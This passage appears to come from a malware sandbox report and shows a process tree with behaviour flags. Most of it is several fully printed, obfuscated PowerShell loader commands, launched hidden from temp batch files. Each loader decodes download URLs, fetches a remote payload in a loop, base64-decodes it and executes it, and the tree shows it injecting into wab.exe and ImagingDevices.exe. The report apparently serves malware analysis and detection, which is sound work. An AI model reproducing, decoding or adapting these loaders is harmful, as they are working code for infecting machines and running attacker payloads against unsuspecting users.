sF KonjoInde r UnfutHandliTvae eRk,bisSused= A nd$Renume,ensonE,rphvCoupe:QsupeaAtomkpOmfatpKagesdOutstaPageut SrgeaJerea ') ;.($Genforeningsfest) (Geranial 'SpillINegatmS inkp ndotoForesrLimintOverc- SpilMkennyo VestdGenneuLovbrlPla.eeIriar TilraBbassei.ompltProudsPetr,TTypesrSkrmsa HeinnUdbygsHjlpefI.ioceBiblirPrvek ') ;$Forties=$Forties+'\Pelecypod.Fru';while (-not $Garantifonde) {.($Genforeningsfest) (Geranial 'Moari$DrejeG.ogara Ce hrRat,oaSpgelnNonmatVildti Rentf,ekjeoForaanRejnedbandie,ypno=Gadit(SlurkTVadpae Ass.sUdsultAr.ll-UnderP.ivsfaKnogltOsierhMaler Doks$Non.hF ,oveoWin crLiquetkompeip,nglePokomsSky l)Lrely ') ;.($Genforeningsfest) $forktret;.($Genforeningsfest) (Geranial ' K taSM ddetMakedaHervrrRunddt Ha.m- CompSGunf.lOverbeTho.leCod,tpHyper Ferie5Totur ');$Arbejdsdatabaser=$Grundejerne[$Alangium++%$Grundejerne.count];}.($Genforeningsfest) (Geranial 'Under$Dio.eHIbrugaApplipTffe.lKassee AnstsUnorgsWoodcnKr,gseSchaps Udsks Fo.t N.rm=disal LarynGsl,ndeKommatBetal-omstdC Undeo Gro,nEtatst mejeeDistrnAntictFlles Ribbe$UopdrFIntr.oAudiorAlebitPala i sculef,skesDicer ');.($Genforeningsfest) (Geranial 'Enar.$ Hul,OAerobuTranst calosSculpkIntrai Hypep WearpUhensiAvl,hnSociagSynd Super=L.uco Quind[.ingeSSladdyPalmysUnd,rtun raehu,idmBilas.S.rjtC.eftaoIntranGoitev.exiceKemotrAnep,tT.vtb] Sc l:Tilba:CacopFB,nzarkongeoTaxacmSimshBChowra Compscombie Over6to,ed4Brod,Sirresttrnerr TrypiBeguinlifebgLat.i(Canne$AbsolHskjora Opl,pconfrlFrekveTerapsEfemesHolm nAmbuleKommusRep,gsent.s)Terri ');.($Genforeningsfest) (Geranial 'Indda$B,rgaPKlikeoR,ttelM,ltiyEctypp xteraMyalgg RevaeEnaa,dVriml Gymna= Gram Bygg[hovedSH,rtiyBlennsabasetSk,lee.rstemsewar.Uda.nTRedwie Gardx UdsptColor.Rrl.dEAb rtnSkreecLinguoSkylid Keldi Alfun RepagScoop]Su.pa:Kinet:SupprAFodgaS,haptCTestrIFejltIsnowi. SepaGGodheeBiophtPrefeSOssuat,hlorrAdganiWappen K njg I,dk(Pauli$KiropODroscuParamt.ittesTe.etkpligtiHumilpTerotpacrodiGr,sanHn,epg Eter) Adly ');.($Genforeningsfest) (Geranial 'Efeue$StatsSAccremun,aik TrapkOryzieKlororTopogsAccul1Metro3Ddni.6K,lde= Gian$ClearPHreviocontelBoligySjalsp R,suaS,mihgPr,ppe ,icad Fr,n.oscilsFolkeuForfabCurbss KroktFo berApproiRetrin EolngZaphr(Dispr2Qui k9So er1befri7U.skr8Bgre.8 Espa,S,lid2Havel4Di pl8 Opsk3Usabl7Gipsy)Deice ');.($Genforeningsfest) $Smkkers136;}"
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zdihcj.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:4640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$Spdbrnene61;++$Spdbrnene61;$Spdbrnene61=$Spdbrnene61-1;Function Tabelopstninger ($Tjenestemaend15){$Latticinio=5;$Latticinio++;For($Ecotones=5; $Ecotones -lt $Tjenestemaend15.Length-1; $Ecotones+=$Latticinio){$Fritidscenterets = 'substring';$Aktionsdiagrammet=$Tjenestemaend15.$Fritidscenterets.Invoke($Ecotones, 1);$Rgfanerne=$Rgfanerne+$Aktionsdiagrammet}$Rgfanerne;}$Mentalistic=Tabelopstninger ' Betih IndutFi,mftGrsropFis esFric :Deci,/Inten/ Bev wAlmenw,raidwvand..U.dersKinkleglasvnIvedrdProm,ssubnipuni.paC nscc SinteStram.OverscSamploPegebmCrice/ Brilp Phanr PapioRege./ LdredSkdyrlG,ote/Morb,0DownpuInvessStudirNeverr WeignUdlig ';$Biocider=$Mentalistic.split([char]62);$Mentalistic=$Biocider[0];$Egocentrien111=Tabelopstninger 'Ej.doiTat leAswaixRadia ';$Eksamenspapir = Tabelopstninger 'Bonde\BurhnsSep ryhandisBraggwSkrupoe,priwEvaku6Medic4Playd\HerbeW.artfiXiphonJobuddKrseloFo snwpassks,harmP moraoGiocow Ent e UnderDecwrSEfterhUnb,aeSammelHjertl Virk\,nkelv ramo1Unju.. Cl,v0 .eri\ oddpKrukko Lan wFaginer.barrSalatsUd,ogh enh,eRhizol,ommalFjlle.UskadeEuclexBiblieOptag ';.($Egocentrien111) (Tabelopstninger 'Ex en$ hairUSu,stnBent dBem,eeSyntarImperkGgemmlEks ueBohemt Fern=Sag.b$Est eeFor.mn,olkevDigle: .eemw O eri CemenForvrdAc,reite terCrape ') ;.($Egocentrien111) (Tabelopstninger 'U.deb$ MesoEUnintkbraktsNitsfaMerismSildeeHindun ForesEucalpH,ndbaChainpBryl,i.aptirvelfo=Xvips$ IndgUJahvinVitridMotiveUklogrGardek AggrlFo.rseAfsmet Elfr+Seque$GenneEO.senkAnspns Oleaap,ojimAbstre LandnFawn sFluorpBaptiamirakpDarneiForm r Prea ') ;.($Egocentrien111) (Tabelopstninger 'Kaffe$.vejsS Bib,lHundeaEtiolnT,ngld Ordre StokrPluri Des,l=Marci Trfsi(Behan(KlokkgPastowExtremkultuiMtted LepiswArkitiPseudnRude,3 Del.2 U.ny_,kadepAfstdrGas.ioTonsic maiseUsta,s G,lisBe,ts Ligg-Jerr.FKonku HejdiPRa,herGemseoCredicSatureDeadfsreruns omplIAnlgsdEssed=Va,in$Smagf{PunktPS.ribI,arynDRei.c}Desm )Svm.e. AflgCpermio ovedmKontrmUnwomaBowlen pcoidPred LBorteiPa.tinLeglee Nonm) Se i Unm r-Fstnis Pe.rpskat.lTilski R betA.mon B sse[FrakkcFo,mah overa TurrrRep,s]eupot3Stutt4,orvk ');.($Egocentrien111) (Tabelopstninger 'stemm$Undd,ECr tegUdhu,eIncitnEremivSte mi OrgalventijTraffeBol.brSillsnsamfueOpgivsBalan Udmug=P,rit Conce$DisceSClitol tabuaInkaanRein dUnm,leAbatir Spro[In,ae$NontaSUdstolTag,iaObjeknGa ond.ivneetatterSkovk.,roghcTrskroVillau Bo.anTerebtKoek.- unco2Sidel]Chris ');.($Egocentrien111) (Tabelopstninger ' Bed $G,eadSVikarkPe geoSukk vBeefat Udviu Phi r BorteParers Ti g=accom(AcacaTGlorie,ndicsPastot,irig-Call.PDobbeaC.unttToldvh hlox Gr nt$ Par,E S,rykFlagesslo baParanmLigane O,finAkutfsBestap.opskaBudskp.oastiHekserIdola)Storf Tilta-Sa meA UdesnSchizd Dame Anti(Ersta[pupidI TabonBinretTrophPR.kret lgumrnonas] redd: Syge:extrasUndseiDisomz S,ile Brus Feltr-acaudeErhveqB ndi Bore8Buffe)Woods ') ;if ($Skovtures) {.$Eksamenspapir $Egenviljernes;} else {;$Biocycles=Tabelopstninger 'TelevSMurdetBrutta Under.ttaitdispl-Inds BU.beli PredtNdv,ns RefeT Suppr berea ElevnAbluesMoneyfSk,ndeHushjrFlank Luni-AarsoSL steobourbuFi.kerArb jcMissieH.mbu Un er$ TuapM.upereSybarnKri,ttSamlea Skv.l Be viClepisPlejetThyreiTantacnon h subsu-IdeolD I aneArchisaf nstKeratiRen,entotneaAfslrtEtiopiCommeo Fi,enTykka Ly.il$comanU Nyern Oil dDetaieDeodorAnglikFaldslPreapeAfskatPel i ';.($Egocentrien111) (Tabelopstninger ' pira$fleliU glomn O,erdAa sleUnretrNaziskrydnil S.lgeEftertBekra=brand$CalloeBagi nElektvResoj:Unpl.aUnworpBrittpHjemedT.vleaGe,netMandea P.mm ') ;.($Egocentrien111) (Tabelopstninger 'MontcIDesmomG,ganpOpsigoPerf,rCritit Seas-R.comMRudeso Fu,kd E udu Paral Cen.eSkru. AfpluBpresiiFanget hav.soversTSkrifrDi kua Vandn Gu.dsWri.lfGronteDeparr Fald ') ;$Underklet=$Underklet+'\Forsamlingsfrihed.ren';while (-not $Strrelsernes) {.($Egocentrien111) (Tabelopstninger 'Tusin$JazysSMallotMadderPo,ytrEnkefeRaa tl LnkesS,lfieFra,mrskyt nAd,areBuss,sFana =You h(RestiTLgteaeMiljlsHumortSekst-GroovP ,itoabib it,ecouhPolya c.nt$PaafuU qualn GigadMythie AnalrReproktabellBadeve Trret,hlam).nvie ') ;.($Egocentrien111) $Biocycles;.($Egocentrien111) (Tabelopstninger 'NohowSSatintNonexaCloserOutdrtEpisi- DyngSSangtlFa tle Rensehas ipNasob Gre,i5Non n ');$Mentalistic=$Biocider[$Egenvgt++%$Biocider.count];}.($Egocentrien111) (Tabelopstninger 'Bean $ TimeS IllutTh.leyBruddrSkgg iUnstunMaringFortms G adgSinolrAnsteuOverhpBilfapA,poie Mor.rLaplan,tuefeSi atsProte Cysti=Dueli esidGShadseD.skftOut.t-.pstaCDis,aoRefernumbratSwi geTripen remotResu, Pa er$ OrchUPlumbnTrommdHyggee Et.erH.stekAnnell skrmeMonartFejlp ');.($Egocentrien111) (Tabelopstninger 'Hops $KokkeMRigleaJamber ubli KendnRadiae NymatKlasstDrifteLivmo Flen=B,ufr Kamin[ForeaS.cissyNeurosUterotPhil,e Polam unor. S,beCFremmoAflevnUanstv agreSmrebrRoun.tDesa,]Vid r:Spuns:Requ,F PragrBistaoM.scumBalanB ska.aFolkesNonnoeTabul6.harp4 ReblS Pe.gtDeto r F,eriClo cnUlovlgS jal(Coher$DykkeSLumi tdominym.tesr KlubiF.rtjnParagg .atus mrbigAntikrDimenu Prelp OpskpMedvie EnterAppernBou eeScrivsEcsta)Hov,s ');.($Egocentrien111) (Tabelopstninger ' Sg,o$Gu.diNPinieeComecpHylobhKomperFlammi RonddSoldeiReconu Indem Creo Ambes= Spe Swine[StavrS kspeyEtymosAttratIso,teCopybm Ulve.Nio.iTPontie UndoxFejlbtUnrec. NonaERictanDispecNikkioSe lyd ermiiBradynUformgspli ] Pret:Par,d:TinteA,ftosSureteCFusioIki.giIChapm.PerenG AnnuePo,trtLame,S S.bctPdof.rSpilliDelprnPinwhg atam(Stand$JulieMRegimaujvnerPrepuiU.sopn FarieVrts,t LocutB,jdse Lige)Coulo ');.($Egocentrien111) (Tabelopstninger 'Analy$AffejNLa,gioChirosLustutChloraBilbil Orn.gBindiipe blkBrevseAxinarA.kiveCaufanCofou=Vrks $V.gotN Skope Magtp I vahFremsrSamspi hymdsl ugiDialouNa.vnm Betj.ShipmsRamtauRugekbErigis MoultDiararHortoiDr.nen ersogCircu(St de2Ne ma9ddsce3Footm7Pleu,5Rek.u7Cumbe,Progr2Re re6Disfa0Tilba1Matri9P.oto)Decis ');.($Egocentrien111) $Nostalgikeren;}"
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ipufcj.cmd" "
5⤵
PID:3224

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$Misviser;++$Misviser;$Misviser=$Misviser-1;Function Terrn ($terminusen){$Thallogen140=5;$Thallogen140++;For($Stabelstoles=5; $Stabelstoles -lt $terminusen.Length-1; $Stabelstoles+=$Thallogen140){$Sammenklumpningens = 'substring';$centranthus=$terminusen.$Sammenklumpningens.Invoke($Stabelstoles, 1);$Wekau236=$Wekau236+$centranthus}$Wekau236;}$dirigentstokke=Terrn 'Deklah Une.t HoontglasupSchemsFyrkl:.erma/ Sto,/SkiftkOu,roiReal.sStraia Cr.snCondubRingkeEli,etPrinthLucifaHydrakFastu.Phrenc HousoSlavem.odel/GudmdPSejrt/ Nedse Pa ti ForgsKrystt bseie dbomdGagerdPlougfskudeosamurdArvefiVrdimc Stat.be,rudUldhawAbovepB evd ';$Mellemniveauets=$dirigentstokke.split([char]62);$dirigentstokke=$Mellemniveauets[0];$Monophonous=Terrn 'AfsiniHere.e Oplaxsquar ';$Dagtemperaturerne = Terrn ' Zapo\ Chais toreyR.daksUnburwAkvapoFortawGlaum6Resaw4 .orm\BrandWSen,ii Wrecn undedDis.gosp.sew trousCacodPT taloK.mmewUdvikeStngerNotaeS R.fahAfsoneOlearlUdstelStru,\ Hermv S.ff1Inkas.Huxte0Kamp.\SnuggpPoddloSpe mwGoodee,porlrDarsosDistrh Sw leEliaslHollblLserk. Of eeSva rx ShoceB,udo ';.($Monophonous) (Terrn 'Ukoll$BjninG Sp.riindfitPersetKaptaeFlaskr T.nfnThiazsfor.t=Utilb$Fdrele veranHandevCalix:C lsiwSlagiiR,stinUn.ildPr griToolmr.yten ') ;.($Monophonous) (Terrn ',ioto$ SekrDPraktaRegr,gNyor,tHalloeUnranmLobefpPor eeT,pplrKligsa GradtSompnuMiljbrPolereOutmar ChasnrearteSol,l= Info$fatt,G Belli,pipht DelstNon ceTra,kr seklnFormasEzba.+ Hump$ UdbyDou,blaGradugAlg etSilkeeCamelm,oodlpEthereApokrrAnf,eas,dest TretuU.enorAntibe PenkrPompin SarkeBrand ') ;.($Monophonous) (Terrn 'Spaan$KighoRStat.aStrmpn SyngdTrytosTro ptDemeraTekstt UntosSul h edtr=Gnidr Ha.kn(unrul( NontgGoralwHjlpemStoryiRevue DingywOospoi ktienReb,i3F.rma2,rall_ xazipPersorslaveoTi skcHertueAfkv,spaleosAvisk Gaard-Chil,FConta Fe.chPm,gnerCadesoMono.cIntereTn stsT.bifsKometIPhotodchi,e= issh$Vesti{cimm,PCharmIUneffDWildf}Sniv ) Indu.FortjCSlateoBaksnmFinanm fstaaLiga n.ncomd.iritLConfeimetasnNeurae Mane)actin Bushv-tropis,arxipRykkelHelioi.iniet syge Sko,e[ Postcam lgh,onsuaEpicer Reci]Omnin3Irrig4Facet ');.($Monophonous) (Terrn ' Anti$OccipDvinkaa dichnAnimasGoerseBuddikRetfroGr,jemMacarpchaptaSt.kegJttesnDia,oiTopf,eSmelttForha Han.n=sprog V ult$GrognR .priaThreanTrustdSavo,sPreputTelefaEksertGe.ytsUdkas[Af je$MisshRSkoleaMole nCariddByggesForsatHandsagoofit GymnsTefil.SemincNatteoBeoenuS stenBelbstOffic-Un.ri2 K.re]Fo.bi ');.($Monophonous) (Terrn ',mirk$AprosUCharln roejfMilieoKabber rchacB reneUnderfepineuSla,slC.noblPhotoy Nonu=nonsy(Unaf.TEksteeKorans ag,nt v.ga-KobbePsank,a laatAlma hSc,em S mpl$oneroDAlginaP,erogElli tUnkeneKajsamOutbrpNonrueWagerrThli.ascroltElaphuSuccerSkatteKe,dor KarinFingee yve)Konfo Unive-Prot,A.onconForsidP.eac Danne(Dejeu[ChlorI MethnLote,tF,shyP Li.otTarqurGrave]Recep:prism: xosps ,atei Eds,zt,tteeGoalk Oplys-Cote e Co.pq Unbe Reimp8 Dua,) uds ') ;if ($Unforcefully) {.$Dagtemperaturerne $Dansekompagniet;} else {;$Understregnings=Terrn ' see SCement Tr gaDufflrYgdrat Stan-Hu.spB DociiH ppotParols MisdTMethorantica trannInters AflyfMicroeDesigrAmali Saddl-AutisSOtidioDesynuLaserrNon,ocEpidieArg r ,ncon$ vertd PreriSammerKi sfiMargeg rinkeIhukonKristtFjernsBestetBundbo Vindk DemokZygadeKagev umbe-BoghoDDybeteHemmesS,onct TilliMacasnGas.aaCorvetKenneiSkjoroMilienSa.se ,ullg$uncatG Mis,iPomf,tSpiontSivsaeB sttrU estn verascontr ';.($Monophonous) (Terrn 'gly.y$ AlleG ,arki.athstudtogtVa reeBedo,r Gru nBar esDepar=eklip$EpipreBrokenHabilvSkods: Presa.ilpapLaur,p To.cdNedlgaSalgstFo ouaLkass ') ;.($Monophonous) (Terrn 'BraseI Jugomdok,mp Fusioadvo,rViburtBawre-,oralM orkoSargadSkummu TanalKonceePaalo VedstBO ganiPhaset CentsS.yllTU bokrAgerbaAssurnPolygs osonfSteicePasterLyksa ') ;$Gitterns=$Gitterns+'\Skandals.Ber';while (-not $Kollisionskurs89) {.($Monophonous) (Terrn 'Obscu$TrbukKBoghvoSeda,lForsoll,mmeiBrdefsA,natiIndokoSchiznFor,as Skovkbugs uVaccerK,edisAmass8Grund9Kabin=Panna(PagioT OpbrerelatsValgttCos,u-Foo,bPBedetaLgprdtPockehLaste Tutus$Cae.aGsempsiCleartOvermtTollbeSta,er WalenGaasesLang )Sa.gs ') ;.($Monophonous) $Understregnings;.($Monophonous) (Terrn ' LderSSapontSurbraKabalrLandmtBurni-B havSRadi,l Col.e.ertreTurqupCanar Stryg5For.i ');$dirigentstokke=$Mellemniveauets[$Jordbrs++%$Mellemniveauets.count];}.($Monophonous) (Terrn 'tid l$PohnaSForhopNyh,de elbrrinvitm Une,aF runtSymptiTejuooA ecigPraxieSandwnis,enoHa.riuSma,fsFluki Silic= Ddss La.ouG ,ovse .urrtBl.dt-HyperCPudleoRaketn alsyt Sp ne Vej.nFordotTilbu Preen$MalefGTetraiNedstt.argitSysteeRestarDa klnPikofsEmigr ');.($Monophonous) (Terrn 'Indkr$ fordV taknotilg iTu sddOpofraSociob blublFasteeKohvenOutdeeStvk sTuchusTrold Bundn=Scaph Lrebo[Cha tSSkresyKoll,sCutintCompoeArsenmDeten.Led iC,anyooForsknFortrvCcnyueC,asmr reortFi.nd] P gl:Af,nn:H droFBygherSkrivo,echamDem,lB VandaRdklks DjaeeFjeli6Coher4StyrtS .umbtRe.skrTransiRes,lnAfbreg Ski,(Autum$ dur,SStoplp SkybeNonscrGuestmTachyaTilgit ,anaiCo opoLubelg.verseAdmirnRou doFrontuPozz sServi)Pend ');.($Monophonous) (Terrn ' Reta$GenneLRe nsaHo.fmeUnenlr Finge topfa Nud,n RestsPhar tAarh a UdtnlOenantDe eneOutpor Fors Coop=gemon Drtr[HunteSGa enyVelsts TvtstTechne Stanm.nnov. AmsaTBumpeere,dhx Besyt Unpr.middlE Str nV.skocKari,obe ysd AfkliAnneknRllikgVirak]Subpr:Lovk.:Da.opAAmoibSOver,CPeakeIIsoclIYeme..LavagG Adj,eReg mtStednSDiesetHypocrPseudiVidernGlucogo erg(All.t$SvaleVPuntioSediliPer.xd teleaAnilibchausl.aaneeForjun BrileRigsbsBdefos Proj) Vall ');.($Monophonous) (Terrn 'Vendi$ onoSTricko Ev,nr SkketCro deBivaarNonsei DrisnCul,igUina,sGra.uf ,rutounbutrMindsm Un esKsneh=Rejse$ iljmL,eleca Palmecerasr KorreStillaAymernpanursSpa.itReabaa,elval PalatBracheTrtterConfi.El.ctsS ndsu BundbAal rsa.tartCo,lir.istniChi.lnMoringForty( pege3 Akam4 Fars8Sexis2Sick,9Tilko2Graas,M,nia2Sid l6,soga5Intro1Overg8Nonfr)Orino ');.($Monophonous) $Sorteringsforms;}"
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1396

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fushdq.bat" "
5⤵
PID:2152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$Needfully;++$Needfully;$Needfully=$Needfully-1;Function Teknificeringer ($stnderforsamlingers){$Nglevrdiers=5;$Nglevrdiers++;For($Klimakteriets=5; $Klimakteriets -lt $stnderforsamlingers.Length-1; $Klimakteriets+=$Nglevrdiers){$Sultne = 'substring';$Azote=$stnderforsamlingers.$Sultne.Invoke($Klimakteriets, 1);$Larkier=$Larkier+$Azote}$Larkier;}$Pelletises=Teknificeringer 'SpurvhMemortPostpt,arecp Posns E id:Barri/Anima/ Glidk C,ani,isass KoncaSporon PrivbEbioneNautitSafiah Ho,oaabecekSeroz.Gudinc ebrao KretmWhite/ddshjPL.nds/ReforMYadeaa Uni.lH ndbaKdva w.rogniAudios SlatkAutom.Tinelt Inteh FarvnGelth ';$Elix41=$Pelletises.split([char]62);$Pelletises=$Elix41[0];$Flgerigtige=Teknificeringer ' tabi asomeDiagrxMoiet ';$Gratisters = Teknificeringer 'Nonba\UndersAdsorySedimsSeag,wSt.nkoBin ewEfter6 In,s4skrid\j rbiWStangiCobwen ,katdComb.o Colew ngens Ch,iPSpr toGraduwAnstneYdelsr okseSS,stehActu,eLigeglMilitlAu,os\UndecvDestr1Je,li.Brain0Preac\ImperpLi.eto SiniwBenvneMarkerRegnvsR.stlhAta.heAf.anlSultelSigne.KoloneAnemixKrnemeMitsu ';.($Flgerigtige) (Teknificeringer 'Eneta$A,batCOinochDelt.o .lokrProduivillao Sp,re arepl.ehaiProtat Trolh Arbeevrvlelplum,iInocuo SwipmBrandaPoisisSpunn=Bald $ SpydeDobben TraivPr.nt:TilpawkompoiGyldin,ymbadCounti,holirStykg ') ;.($Flgerigtige) (Teknificeringer 'Vag.r$F.rtvGHalvarHoveda Narat L,afiLapnisBerett.lesheCovesrCeredsSluic= Lren$Unc.nC heowhUndreoLawisrFuskeiB nenoIn nae BrakpNanopiS.rintMastehTa pee StaalUnd,riSecu oquaapmReoblaIndensMuffe+nedla$Fu,loG U.harFormuaUnthrtAutoliDeanssFamiltChesse S.lsrSynodsBes r ') ;.($Flgerigtige) (Teknificeringer 'W nkl$ ga.mLsigmayRettes FremsMinidhGispeoUnchewSukreePokalnKommaeScrob Skaff= Fudd Embow(Hydr,(Sepiog Far wKryolmSkraaiOpere M ditwIns,riStttenUnder3Dysts2Mahat_DatacpTrut,r .remoF rsoc.dealeInvits Be,rs.nlam .tra-Ble.nFPale ZoophPnedbrrLikvio TankcVi orejackssgy nasScionIKnutsd Ove =F les$ Unco{Ubem,PHulsmI DecrD Neje}Tansi)Anti .BrostC RoseoPar emUndepmDumpia Stu nalgerd TuyeLassyriLipotn IndeeLanzk) Skuf Tekst-LasersFilmapOmlydl Fyr.i acrot Nyct antir[SammecCoagghTiti.aDisesr E fo]Gordi3Forsg4 Br.d ');.($Flgerigtige) (Teknificeringer 'Enfam$Cat,aPShootiAnschgophicnSkam.o,retmrSlaloa Have Firl=Imm,t P,unc$AdvocL MongyTriumsOverfsBogymh Aft oHypo,wA,ecteLunkenGelateDekli[ Te n$UdkonL Buddyc,xarsAristsSesamhTrlasoPladswEnmare MyrdnSym.oeJahnf. Pot.cStedfojuliuuEnetanCh,lat Lsgr- Feri2 yghv]Tops, ');.($Flgerigtige) (Teknificeringer 'Fdeva$RaasaESuprav ,onoaTepidlBookruCand,aSammetGoodioRacklr Varms Blon=Agt r(ParalTKonfreSto.ms Fondtsk.ff-AllokPDelggaEftertUnderhcommo Seksu$Fdr.nGUrgerrInd.caPoo.etBillaiWrains St.ftTrut e,tvunrdatassInexp)Stabi Su er-Uni,nAIdentn.iliedSundh Quize(Pla l[ DeplI Brnen achrtTjvasPPlat.tisoherForz,]Blung:Cou,t: vands.etaciCri pzAnesteN,rmt ,eigh-NarkoePayinqF yns Pjat8 N ri)Masse ') ;if ($Evaluators) {.$Gratisters $Pignora;} else {;$Centroincs=Teknificeringer ' sta,SInt.rtGuttia decirDannetUngmc-KontrBDeuteiBedect Indes,esteTUnsusr V,llaVesicn Po,tsSamlefLarv,e radrNede. Haand-PhoroSD.alyoA.giouQuantrIndracBawkeeStaa, U fal$dematPSmagle ExullForbyl,talieOutsit .elvi Sl,lsWhaupeknskvsSk.bs Gyros-ArgumDBassoeArraisU,idit .antiTomtsnBagveaUnsaft Da.oi egnso Sa.mnKon r Se id$Axio.CDecolh UnoroH laurAdelsianastoRappeeP,devpBeregiVi,iatSlvrihIchneeMethylBe,efi BlgeoFami.mLuftvaRvfulsfl.te ';.($Flgerigtige) (Teknificeringer ' Adul$Uge,sCMyth,hdrnino ShlirSubtii InosoRachie Whipppaa ki dhugtUnde,hsl,taeAgurklFactoiGyratoPostnmUrigta Sn,ks L,gr= St d$Panc eHea hnrescrvUds i:G.undaMu.erp Dribp Syg dDeltaaMe.zitNdtrfaAenea ') ;.($Flgerigtige) (Teknificeringer 'UprusIBen.im DetapU.suroBreadrDobbetVaag -TesseMUdskioInklidHusmauVelsel,ecope Indt SemimB .areiAl,rmtReas sCro.tT PerirNewswaPatc nApyresTocokfUran,ePrepur ,eko ') ;$Chorioepitheliomas=$Chorioepitheliomas+'\Neonlysenes.Sti';while (-not $Sarkom) {.($Flgerigtige) (Teknificeringer 'Rinse$OverhSProctaIsodrr ubrkSt iko E.ogmY.erk= Eve.(scragTDi.bueIndefsViremtFlavo-MargrPCoal a YndltErotoh Rtsh Bacte$KrudtCNatiohMi proMalearkranhi Strao,agvreLecotp Se vi IndltInatthData e T.ndlRatifiSttemoAerogm BomhaT,ksasPrior) colo ') ;.($Flgerigtige) $Centroincs;.($Flgerigtige) (Teknificeringer ' TestSConcotPostpaSpaperOv.rst ca,a-GuddoS SyntlDame eBerateKlapspOverf .rocu5Makes ');$Pelletises=$Elix41[$Landvindinger++%$Elix41.count];}.($Flgerigtige) (Teknificeringer 'Kodri$ Oxy UMaremnLunelp.empeeKn,plrKa.kei,algssJvninhNadveaSubstbBio,rlElectyBlte Sel.=Alca, ProcGricareSoftdt Flor-AhiroCFinmeoPostlnSynertChortePointn AftetRudev Forg$KrebiCTapr hHeteroUnlanr DetriDebutoDesigeAnkelp TilsiHj,ejtSwepthAwakeeAcheclCho,eifirmaoOvernmMoboca StudsReobl ');.($Flgerigtige) (Teknificeringer ' veri$Baa,dD .oorrGabgaoGuldanIndfonInd.ki.akken ForfgDommee An,lnLflassCleoc Konta=Trust Smaa[Po,emSRandsyFor.isGrillt Aut,eCossimBe,gl.PektiC,etaroAirp.nProjev Che.e spolrDogmatUdsty]Lym,h:Depri: fls.FBelinrPrecooPausemThermBundisaPhlebsBo.lseDokum6Tungt4 remaSForsitPen irL vkeiEras,naflo,gRin,e(E.ope$grillUFis.enYasmipEvoleeFjersrstaaliStyl sAfbeth,astla FrembSmasklVindiyjaevn) Nedb ');.($Flgerigtige) (Teknificeringer ' Abon$XyloiCHyd,ahStewiaAirglfNum.ffCoccoiS,ittnNyta,eT lbas Pr,ssGauli Unsch=Asymb none[OxymaS N.nmyPr orsPietrtMonoveEnti.mFabri. ProjTKmpede c.llxShutetSelsk.For nE ,chin Cowmc SilkoMarcedFyrstiInfibnTouc,gKvgpr]K,lun:De on: DispAAnisoSRadiuCBemanIDomicI Spil.IntraGFl,steK.skotBekldSUdspitGnaskr Caboivibexn Sp.agAktie( red $Be.avDRiv.trMok aotestbnFloddn M,siiSerben Skaag KeraebasidnAdsk,sLat n)Ove,f ');.($Flgerigtige) (Teknificeringer ' At.a$UnderHVog moHeritrUpbuin.ndgalArm.riNonlik do meGaggl8Nitty3Ef.ec=Udvlg$ Ko kCal dahVarskaPervef For,fCrilei ObelnPeadaebestvsBejdss Undi.Ophrys.ekseu oponbTafiasBreastFiftyrSkattiBevidnBrnemg opsa(Qua r3,road1Noopo5oprre8Crane6 Peac4Und,t,Galde2Appal5 Worl6 Ach.2.ndta1Prayi) Slo ');.($Flgerigtige) $Hornlike83;}"
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:3084

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:4348

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:5600

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:2568

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:4416

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:5508

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:5460

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:5608

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:5944

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:4392

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:4236

